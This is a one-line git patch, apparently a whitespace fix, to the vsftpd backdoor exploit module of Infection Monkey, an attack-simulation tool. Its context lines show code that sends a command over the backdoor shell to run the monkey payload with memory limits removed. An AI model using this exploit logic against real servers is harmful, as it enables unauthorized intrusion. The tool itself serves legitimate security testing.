From af5cc9031a2ef4dde54d16f279ae90113ff99fa6 Mon Sep 17 00:00:00 2001 From: Dhayalan Date: Wed, 22 May 2019 16:25:43 +0200 Subject: [PATCH] Update vsftpd.py --- monkey/infection_monkey/exploit/vsftpd.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py index 785b316a1..1d99f130e 100644 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ b/monkey/infection_monkey/exploit/vsftpd.py @@ -136,7 +136,7 @@ class VSFTPDExploiter(HostExploiter): run_monkey = RUN_MONKEY % {'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters} # Set unlimited to memory - run_monkey = ULIMIT_V + UNLIMITED + run_monkey + run_monkey = ULIMIT_V + UNLIMITED + run_monkey # we don't have to revert the ulimit because it just applies to the shell obtained by our exploit run_monkey = str.encode(str(run_monkey) + '\n') time.sleep(FTP_TIME_BUFFER) if backdoor_socket.send(run_monkey):